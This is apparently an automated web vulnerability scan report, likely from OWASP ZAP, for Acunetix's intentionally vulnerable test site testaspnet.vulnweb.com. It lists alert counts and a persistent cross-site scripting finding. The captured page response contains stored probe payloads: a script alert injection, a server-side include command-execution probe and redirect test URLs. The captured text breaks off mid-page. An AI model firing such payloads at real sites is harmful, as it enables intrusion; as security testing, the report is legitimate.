Contents
About this report
Report parameters
Contexts
No contexts were selected, so all contexts were included by default.
Sites
The following sites were included:
- http://testaspnet.vulnweb.com
(If no sites were selected, all sites were included by default.)
An included site must also be within one of the included contexts for its data to be included in the report.
Risk levels
Included: 高等的, 中等的, 低, Informational
Excluded: None
Confidence levels
Included: User Confirmed, 高等的, 中等的, 低
Excluded: User Confirmed, 高等的, 中等的, 低, 假阳性
Summaries
Alert counts by risk and confidence
| Confidence | ||||||
|---|---|---|---|---|---|---|
| User Confirmed | 高等的 | 中等的 | 低 | Total | ||
| Risk | 高等的 | 0 (0.0%) |
0 (0.0%) |
6 (3.3%) |
15 (8.2%) |
21 (11.5%) |
| 中等的 | 0 (0.0%) |
0 (0.0%) |
26 (14.2%) |
0 (0.0%) |
26 (14.2%) |
|
| 低 | 0 (0.0%) |
29 (15.8%) |
99 (54.1%) |
4 (2.2%) |
132 (72.1%) |
|
| Informational | 0 (0.0%) |
0 (0.0%) |
0 (0.0%) |
4 (2.2%) |
4 (2.2%) |
|
| Total | 0 (0.0%) |
29 (15.8%) |
131 (71.6%) |
23 (12.6%) |
183 (100%) |
|
Alert counts by site and risk
| Risk | |||||
|---|---|---|---|---|---|
|
高等的 (= 高等的) |
中等的 (>= 中等的) |
低 (>= 低) |
Informational (>= Informational) |
||
| Site | http://testaspnet.vulnweb.com | 21 (21) |
26 (47) |
132 (179) |
4 (183) |
Alert counts by alert type
| Alert type | Risk | Count |
|---|---|---|
| Cross Site Scripting (Persistent) | 高等的 | 1 (0.5%) |
| Cross Site Scripting (Reflected) | 高等的 | 3 (1.6%) |
| SQL Injection | 高等的 | 2 (1.1%) |
| Viewstate without MAC Signature (Unsure) | 高等的 | 15 (8.2%) |
| X-Frame-Options Header Not Set | 中等的 | 26 (14.2%) |
| Cookie without SameSite Attribute | 低 | 2 (1.1%) |
| Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) | 低 | 38 (20.8%) |
| Timestamp Disclosure - Unix | 低 | 4 (2.2%) |
| X-AspNet-Version Response Header | 低 | 29 (15.8%) |
| X-Content-Type-Options Header Missing | 低 | 34 (18.6%) |
| 缺少反CSRF令牌 | 低 | 25 (13.7%) |
| 字符集不匹配 (Header Versus Meta Content-Type Charset) | Informational | 4 (2.2%) |
| Total | 183 |
Alerts
-
Risk=高等的, Confidence=中等的 (6)
-
http://testaspnet.vulnweb.com (6)
-
Cross Site Scripting (Persistent) (1)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags Alert description Cross-site Scripting (XSS) is an attack technique that involves echoing attacker-supplied code into a user's browser instance. A browser instance can be a standard web browser client, or a browser object embedded in a software product such as the browser within WinAmp, an RSS reader, or an email client. The code itself is usually written in HTML/JavaScript, but may also extend to VBScript, ActiveX, Java, Flash, or any other browser-supported technology.
When an attacker gets a user's browser to execute his/her code, the code will run within the security context (or zone) of the hosting web site. With this level of privilege, the code has the ability to read, modify and transmit any sensitive data accessible by the browser. A Cross-site Scripted user could have his/her account hijacked (cookie theft), their browser redirected to another location, or possibly shown fraudulent content delivered by the web site they are visiting. Cross-site Scripting attacks essentially compromise the trust relationship between a user and the web site. Applications utilizing browser object instances which load content from the file system may execute code under the local machine zone allowing for system compromise.
There are three types of Cross-site Scripting attacks: non-persistent, persistent and DOM-based.
Non-persistent attacks and DOM-based attacks require a user to either visit a specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack. Using a malicious form will oftentimes take place when the vulnerable resource only accepts HTTP POST requests. In such a case, the form can be submitted automatically, without the victim's knowledge (e.g. by using JavaScript). Upon clicking on the malicious link or submitting the malicious form, the XSS payload will get echoed back and will get interpreted by the user's browser and execute. Another technique to send almost arbitrary requests (GET and POST) is by using an embedded client, such as Adobe Flash.
Persistent attacks occur when the malicious code is submitted to a web site where it's stored for a period of time. Examples of an attacker's favorite targets often include message board posts, web mail messages, and web chat software. The unsuspecting user is not required to interact with any additional site/link (e.g. an attacker site or a malicious link sent via email), just simply view the web page containing the code.
Other info Source URL: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Request Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232 Content-Length: 0Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:07:41 GMT Content-Length: 35389Response body (35389 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBaCAmYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIH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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLwoL2oCgKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8k7r0hE7xuM6hcVBvJF3jZU0DvVQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV 